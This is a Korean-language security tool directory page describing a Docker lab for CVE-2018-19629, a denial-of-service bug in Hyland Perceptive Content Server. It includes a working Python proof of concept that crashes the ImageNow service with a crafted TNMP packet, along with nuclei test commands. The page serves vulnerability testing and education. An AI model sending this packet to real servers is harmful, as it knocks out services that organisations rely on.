Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-19629 — Hyland Perceptive Content Server - 서비스 거부 | Kitploit
도구/GitHubGitHub/excellencedev/cve-2018-19629
Container SecurityVulnerability AnalysisExploitationLearning & EducationLabs & Practice
GitHubexcellencedev/cve-2018-19629

CVE-2018-19629

Hyland Perceptive Content Server - 서비스 거부

저장소 보기
8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-19629 테스트 환경

CVE-2018-19629 - Hyland Perceptive Content Server 서비스 거부(Denial of Service)를 위한 Docker 테스트 환경입니다.

취약점 세부 정보

필드값
CVE IDCVE-2018-19629
심각도높음(DoS)
영향받는 버전Hyland Perceptive Content Server < 7.1.5
패치 버전7.1.5

설명

Hyland Perceptive Content Server 7.1.5 이전 버전에는 TCP 연결을 통해 ImageNow Server 서비스를 중단시키는 서비스 거부 취약점이 있습니다. 공격자는 TNMP 헤더 시퀀스가 포함된 특수 제작된 TCP 패킷을 전송하여 서비스를 방해할 수 있습니다.

빠른 시작

root@kitploit:~
# Start the vulnerable environment
docker-compose up -d

# Verify it's listening
# (You might need netcat or similar)
nc -zv localhost 6000

Nuclei로 테스트

root@kitploit:~
# Test with nuclei template
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000

수동 검증

Python을 사용하여 수동으로 크래시를 트리거할 수 있습니다:

root@kitploit:~
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()

크래시를 확인하려면 로그를 확인하세요:

root@kitploit:~
docker logs -f imagenow-vuln

다음과 같은 메시지가 표시되어야 합니다: [!] CRITICAL: Recevied malicious 'TNMP' packet... 그 다음 컨테이너가 재시작됩니다.

환경 세부 정보

  • 포트: 6000 (TCP)
  • 프로토콜: 사용자 지정 TCP (ImageNow)

정리

root@kitploit:~
docker-compose down
도구 다운로드